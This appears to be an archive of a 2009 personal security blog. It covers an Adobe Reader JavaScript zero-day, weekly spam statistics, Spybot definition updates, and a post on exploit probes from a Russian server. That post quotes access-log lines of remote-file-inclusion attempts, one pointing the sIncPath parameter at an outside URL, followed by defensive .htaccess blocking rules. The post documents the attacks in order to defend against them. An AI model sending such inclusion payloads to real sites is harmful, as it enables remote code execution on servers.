Wiz's Computer and Website Security Blog

New zero-day JavaScript exploit targets Adobe Reader
04/29/2009:

Adobe Systems Inc. confirmed on Tuesday, April 28, 2009, that it is investigating reports that its popular PDF viewing software, Adobe Reader, contains another critical vulnerability.

A hacker using the handle "Arr1val" has discovered and published two zero day exploitable vulnerabilities in the Adobe Reader and Acrobat. Both of them make it possible for an attacker to execute arbitrary code on systems with the affected products installed, by tricking users into opening a maliciously crafted PDF file. He tested them first using Linux, on Adobe Readers 8.14 and 9.1, which are the most recent versions. Later on he retested it using Windows and Mac computers are found the same vulnerability exists under those platforms. Interestingly, Adobe only recently released those versions to fix several other critical vulnerabilities in its Reader and Acrobat programs.

The new bug was first disclosed Monday (4/27/09) on the SecurityFocus website, which published advisory 34736 containing a link to proof-of-concept attack code. The advisory is titled: "Adobe Reader 'getAnnots()' JavaScript Function Remote Code Execution Vulnerability." An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application, according to the advisory.

According to Adobe, all versions of their Reader, even the most up-to-date versions, Reader 9.1 and Reader 8.1.4, are vulnerable. The affected platforms include at least Windows, Mac and Linux and Unix.

This information has been posted on the Adobe website, by the Adobe Product Security Incident Response Team (PSIRT), in an article titled: Update on Adobe Reader Issue

"This is an update on the Adobe Reader vulnerability first discussed on the Adobe PSIRT blog on April 27 (“Potential Adobe Reader Issue”). All currently supported shipping versions of Adobe Reader and Acrobat (Adobe Reader and Acrobat 9.1, 8.1.4, and 7.1.1 and earlier versions) are vulnerable to this issue. Adobe plans to provide updates for all supported versions for all platforms (Windows, Macintosh and Unix) to resolve this issue. We are working on a development schedule for these updates and will post a timeline as soon as possible. We are currently not aware of any reports of exploits in the wild for this issue. To mitigate the issue disable JavaScript in Adobe Reader and Acrobat using the following instructions below:"

1. Launch Acrobat or Adobe Reader.


2. Select Edit>Preferences


3. Select the JavaScript Category


4. Uncheck the ‘Enable Acrobat JavaScript’ option


5. Click OK

I will publish additional details as they become available. You should also check the Adobe website and blog for updates and use the built-in Check for Updates function found under the Help menu, on all current versions of Adobe Reader.

Note, that users who operate with less that Administrator privileges would be less impacted if they came upon or were lured to a website containing exploit codes for this vulnerability, or any other.

Posted by Wiz at 1:46 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. The interesting fact about those two rules is that the same forged domain name prefix is used on both sides of the @ symbol. So, if you see an incoming email with a sender listed as kefsomedomaindiz@somedomain.com it will match that rule. These particular spam messages are sent from a Botnet that has fallen silent for some reason; possibly due to large-scale disinfection (e.g: by the Microsoft Malicious Software Removal Tool), or takedowns of command and control servers used by that Botnet (see takedown of McColo).

I am seeing a greatly reduced amount of spam, possibly due to me being white-listed by spammers, trying to avoid my honeypots, or because of troubles spammers might be having controlling their Botnets. Nonetheless, the types of spam I am getting are most likely the same types you are getting, just in a different quantity. The classifications can help you adjust your email filters according to what is most common, on a weekly basis. Much of the spam this week was for the fake "Canadian Pharmacy" and Nigerian 419 advance fee fraud and money laundering scams. Other classifications, like Blocked Countries, usually include counterfeit drug promotions, sometimes in embedded images, or in vertical text and html tricks.

MailWasher Pro spam category breakdown for April 20 - 26, 2009. Spam amounted to 7% of my incoming email this week. This represents a 1% decrease from last week.

Download MailWasher Pro Here

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft/Windows Live Mail, Eudora, Mozilla and other stand-alone email programs).

To protect your computer from malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.

All spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by career criminals, many of whom live in Eastern Europe, in the former Soviet Union. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions).

If you are foolish enough to purchase spamvertised pharmaceuticals you may be placing your health in danger. The pharmacies producing these drugs are in China and other Asian countries, including India. Their pills are not approved for use in the US or Canada, where they are targeted. All claims to the contrary are false. Canadian Pharmacy is fake. It does not exist in Canada, nor is it licensed there! It is a scam website, hosted on zombie computers in Botnets. The drugs they push are Asian made counterfeits and could cause you harm.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 1:30 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware, it is time again to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. This week's updates were released on schedule on April 22, 2009, as listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link, or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, or Hosts, or Domains, as you see fit, then click on Immunize button over the right panel, that has a green cross. Sometimes, Spybot immunizes against cookies and domains that you may actually want to visit. If you suddenly find you cannot login, or cookies are missing, you can undo the most recent Immunizations, then uncheck the desired items and re-immunize. Websites added to your Windows HOSTS file during immunization will be blocked completely, so you may need to edit that file in Notepad, saving as HOSTS, without any extension, or uncheck it from immunization if your preferred websites are blocked by Spybot S&D.

After immunizing against unwanted items you should click on the Search & Destroy icon, on the left, then click "Check for problems," on the right side. It will take several minutes, or longer to scan all your files for known threats, and possible threats, using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes anything listed in the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, click on the item name and the right click and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Also, the TeaTimer module was recently updated to version 1.6.6. If you use the Spybot Tea Timer you may want install this update (as an administrator) (Or maybe not! See notes below concerning false positives in TeaTimer.).

Additions made on April 22, 2009:

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ CMVideo
+ Fraud.PCHealth
+ Win32.Alman.a

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Bifrost.LA
+ Virtumonde.Dll
+ Virtumonde.prx
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.TDSS.bae
+ Win32.TDSS.cl
+ Win32.TDSS.dt
+ Win32.TDSS.rtk
+ Win32.ZBot
+ Zlob.DNSChanger
+ Zlob.Downloader
+ Zlob.Downloader.rid

Total: 1594677 fingerprints in 507675 rules for 4619 products.

False positive detections reported or fixed this week:

A false positive detection of Spambot.mib, in Keepass's Plugin KeeForm, has been fixed with this week's updates.

A false positive detection of "Fraud Virus Doctor," by the updated TeaTimer module, has been reported by several people in various files and folders, all of which are confirmed false positives.

I recommend NOT installing the TeaTimer module at this time, unless you are an advanced user! There are just too many false positives since the updated version was released. If you are unsure about the validity of a TeaTimer pop-up alert regarding a process having been terminated, do not select the option to delete the file.

You should send feedback about TeaTimer false positives to Team Spybot, after registering with the Safer-Networiking forum.

If you have purchased McAfee, Symantec, or Trend Micro security suites (which are very good products) and they ask you to uninstall Spybot, or do so without your option to refuse, simply reinstall Spybot afterward. But, I recommend not activating the TeaTimer module in Spybot S&D, as this will cause a struggle over which program monitors the system for realtime changes.

Extended Comments

Various reports from the Internet and from Safer-Networking's own testing seem to indicate that there is a problem between Internet Explorer 8 and the immunization feature of Spybot - Search & Destroy, causing a slow startup of IE 8. It is caused by the large number of websites added to the browser's Restricted Sites Zone. This is being worked on by Team Spybot.

Team Spybot has changed the name of the Spybot S&D setup file. The installer file that is downloaded to the desktop during a main update (to allow you to see the file and store it elsewhere if you want) is now named setup-spybotsd162.exe instead of spybotsd162.exe to avoid confusion with the regular Spybot... start link. The new naming convention should continue with future releases.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

Older versions of Spybot are no longer being updated or supported. If you are using any version older than 1.62 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 4:53 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. The interesting fact about those two rules is that the same forged domain name prefix is used on both sides of the @ symbol. So, if you see an incoming email with a sender listed as kefsomedomaindiz@somedomain.com it will match that rule.

I am seeing a greatly reduced amount of spam, possibly due to me being white-listed by spammers, trying to avoid my honeypots. Nonetheless, the types of spam I am getting are most likely the same types you are getting, just in a different quantity. The classifications can help you adjust your email filters according to what is most common, on a weekly basis. The majority of spam this week was for male enhancement scams (all such products are fake) and Nigerian 419 advance fee fraud scams.

MailWasher Pro spam category breakdown for April 13 - 19, 2009. Spam amounted to 8% of my incoming email this week. This represents a 1% decrease from last week.

Download MailWasher Pro Here

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft/Windows Live Mail, Eudora, Mozilla and other stand-alone email programs).

To protect your computer from malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 2:47 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware, it is time again to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. This week's updates were released on schedule on April 15, 2009, as listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link, or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, or Hosts, or Domains, as you see fit, then click on Immunize button over the right panel, that has a green cross. Sometimes, Spybot immunizes against cookies and domains that you may actually want to visit. If you suddenly find you cannot login, or cookies are missing, you can undo the most recent Immunizations, then uncheck the desired items and re-immunize. Websites added to your Windows HOSTS file during immunization will be blocked completely, so you may need to edit that file in Notepad, saving as HOSTS, without any extension, or uncheck it from immunization if your preferred websites are blocked by Spybot S&D.

After immunizing against unwanted items you should click on the Search & Destroy icon, on the left, then click "Check for problems," on the right side. It will take several minutes, or longer to scan all your files for known threats, and possible threats, using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes anything listed in the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, click on the item name and the right click and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Also, the TeaTimer module was recently updated to version 1.6.6. If you use the Spybot Tea Timer you may want install this update (as an administrator) (Or maybe not! See notes below concerning false positives in TeaTimer.).

Additions made on April 15, 2009:

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Fraud.MalwareDefender2009
+ Fraud.PrivacyCenter
+ Fraud.SpywareRemover2009
+ Fraud.SystemGuard2009
+ Fraud.VirusDoctor
+ Win32.Agent.lta
+ Win32.Buzus.amit

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Virtumonde.atr
+ Virtumonde.Dll
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.bhi
+ Win32.Agent.boym
+ Win32.Agent.yjl
+ Win32.Dialer.bkm
+ Win32.Parsi.z
+ Win32.PcClient.afun
+ Win32.TDSS.dt
+ Win32.TDSS.gen
+ Win32.TDSS.pe
+ Win32.TDSS.rtk
+ Win32.TDSS.vot
+ Win32.ZBot
+ Zlob.Downloader

Total: 1588012 fingerprints in 505617 rules for 4614 products.

False positive detections reported or fixed this week:

Last week's updates included both Immunization and HOSTS file entries that blocked AdultFriendFinder.com and Cams.com. Both additions were made in error and will be corrected with an upcoming update.

A confirmed false positive detection of Virtumonde.sdn, in the file C:\WINDOWS\system32\toyhide.bmp, was fixed today.

A false positive detection of "Fraud Virus Doctor," by the updated TeaTimer module, has been reported by several people in various files and folders, all of which are confirmed false positives.

I recommend NOT installing the TeaTimer module at this time! There are just too many false positives since the updated version was released. If you are unsure about the validity of a TeaTimer pop-up alert regarding a process having been terminated, do not select the option to delete the file.

You should send feedback about TeaTimer false positives to Team Spybot, after registering with the Safer-Networiking forum.

If you have purchased McAfee, Symantec, or Trend Micro security suites (which are very good products) and they ask you to uninstall Spybot, or do so without your option to refuse, simply reinstall Spybot afterward. But, I recommend not activating the TeaTimer module in Spybot S&D, as this will cause a struggle over which program monitors the system for realtime changes.

Extended Comments

Various reports from the Internet and from Safer-Networking's own testing seem to indicate that there is a problem between Internet Explorer 8 and the immunization feature of Spybot - Search & Destroy, causing a slow startup of IE 8. It is caused by the large number of websites added to the browser's Restricted Sites Zone. This is being worked on by Team Spybot.

Team Spybot has changed the name of the Spybot S&D setup file. The installer file that is downloaded to the desktop during a main update (to allow you to see the file and store it elsewhere if you want) is now named setup-spybotsd162.exe instead of spybotsd162.exe to avoid confusion with the regular Spybot... start link. The new naming convention should continue with future releases.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

The domain "Spywareinfo.com" and TrafficZ was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed real soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums. The latest addition is Manual Removal Guide for Win32.TDSS.qa.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 1:01 PM | Permalink

back to top ^

Many of my regular visitors are aware that I maintain and publish various IP address blocklists, used to protect websites and web servers from nefarious activities by scammers, spammers and exploiters. Today, my website came under attack from a Russian Server, located in Saint Petersburg, Russia. The attacks were server exploit attempts, using various Query strings and http redirects. All were blocked by my security measures, but there were so many attempts in a short period of time that I feel that I should spread the word to other webmasters, before it is too late.

First off, server exploit attempts are nothing new. They happen every day and are easily seen if you read your website's raw access logs or stats. Most exploit attempts are fast in/out probes, usually coming from rotating IP addresses, and only a few at a time. But, the attack I logged this morning was different than the usual model. In a 26 minute period I received 69 exploit probes from the same IP address. I ran a Whois lookup on the IP 77.221.130.5 and found that is it assigned to Server 005 on infobox.ru, in Saint Petersburg, Russia. This is a virtual hosting and colocation data center, who's assigned address range is from 77.221.128.0 - 77.221.143.255, which is designated by the network CIDR: 77.221.128.0/19.

Security-minded webmasters are interested in blocking offending IP addresses and the CIDRs that encompass exploited servers. Most folks running websites are hosted on Apache web servers and are using shared hosting accounts, where they can only use .htaccess file "directives" to block unwanted Internet traffic. Some web hosts may allow only "Mod_Access" directives in user defined .htaccess files. Here is a Mod_Access rule you can add to your .htaccess file to block the offending Russian data center mentioned above:

<Files *>
order deny,allow
deny from 77.221.128.0/19
</Files>

In the above .htaccess directive all IP addresses are permitted access to all files (Files *), except for those IPs included within the CIDR 77.221.128.0/19. This is due to the "order" statement (order deny,allow), where deny is processed before allow. Anything defined in "deny from" rules is processed first. Anything not specifically denied is allowed by default.

I mentioned in the opening paragraph that I publish various IP blocklists (a.k.a. Blacklists). The list that blocks the source of this exploit is called the Russian Blocklist, which includes numerous IP address ranges in Russia, The Ukraine, Turkey and several other former Soviet Union countries. These lists are available in two formats each. The most commonly used format is my .htaccess blocklists and the lesser used type is my iptables blocklists.

Currently, there are four separate blocklists per format. They are the "Chinese" (and Indo-China), "Exploited Servers" (+ proxies), "Nigerian" (and African) and "Russian" (+ Turkey and former Soviet Union) Blocklists. If you use a shared web hosting account you will only be able to use the .htacccess format. If you have a VPS or fully dedicated server you can probably use the iptables blocklists, which require "root" access to the OS. The iptables blocklists deny all access to a server and all of its modules, including email and ftp servers. A .htaccess blocklist can only deny access to http and https traffic. Either type will block the exploit probes listed in my extended comments. The landing pages explain how to use the directives contained in each blocklist.

All of my blocklists are currently free for the taking, but I do appreciate donations if you benefit from my work. You will find PayPal Donate buttons on each blocklist page.

Evidence of exploit probes emanating from a Russian web server, located at 77.221.130.5

77.221.130.5 - - [13/Apr/2009:03:47:23 -0700] "GET /blogs/domainwebsite_issues///?sIncPath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 403 47 "-" "Mozilla/5.0"

77.221.130.5 - - [13/Apr/2009:03:49:12 -0700] "GET ///?sIncPath=uid=1512(z71584)%20gid=106(hosting)%20groups=106(hosting)%0A? HTTP/1.1" 403 47 "-" "libwww-perl/5.805"

77.221.130.5 - - [13/Apr/2009:03:50:22 -0700] "GET /blogs/domainwebsite_issues///?sIncPath=uid=1512(z71584)%20gid=106(hosting)%20groups=106(hosting)%0A? HTTP/1.1" 403 47 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

77.221.130.5 - - [13/Apr/2009:04:13:02 -0700] "GET /blogs/2009///?sIncPath=uid=1512(z71584)%20gid=106(hosting)%20groups=106(hosting)%0A? HTTP/1.1" 403 47 "-" "libwww-perl/5.805"

If you have Mod_Rewrite available for your use, you can block the above abused user agents using these directives, in your public_html or web root .htaccess file:

Options +FollowSymLinks
RewriteEngine On
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4\.8\ \[en\]\ \(Windows\ NT\ 5\.0;\ U\)$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
RewriteRule .* - [F]

If you have a custom 403 error page you will need to change the RewriteRule to allow access to that page. Here is an example of a custom 403 page named 403.html, or 403.shtml, or 403.php:

RewriteRule !^403\.(s?html|php)$ - [F]

I am available for hire to install and administer blocklists to protect your websites from scammers, spammers and server exploiters. Contact me with your details of server abuse and I will assess your situation and give you a reasonable quote. My security work is currently limited to websites hosted on Apache web servers. If you are hosted on a Windows based server you will have to contact your web host for help applying my blocklists.

Posted by Wiz at 12:15 AM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. The interesting fact about those two rules is that the same forged domain name prefix is used on both sides of the @ symbol. So, if you see an incoming email with a sender listed as kefsomedomaindiz@somedomain.com it will match that rule.

I am seeing a greatly reduced amount of spam, possibly due to me being white-listed by spammers, trying to avoid my honeypots. Nonetheless, the types of spam I am getting are most likely the same types you are getting, just in a different quantity. The classifications can help you adjust your email filters according to what is most common, on a weekly basis.

MailWasher Pro spam category breakdown for April 6 - 12, 2009. Spam amounted to 9% of my incoming email this week. This represents a 3% increase from last week.

Download MailWasher Pro Here

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft/Windows Live Mail, Eudora, Mozilla and other stand-alone email programs).

To protect your computer from malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security.

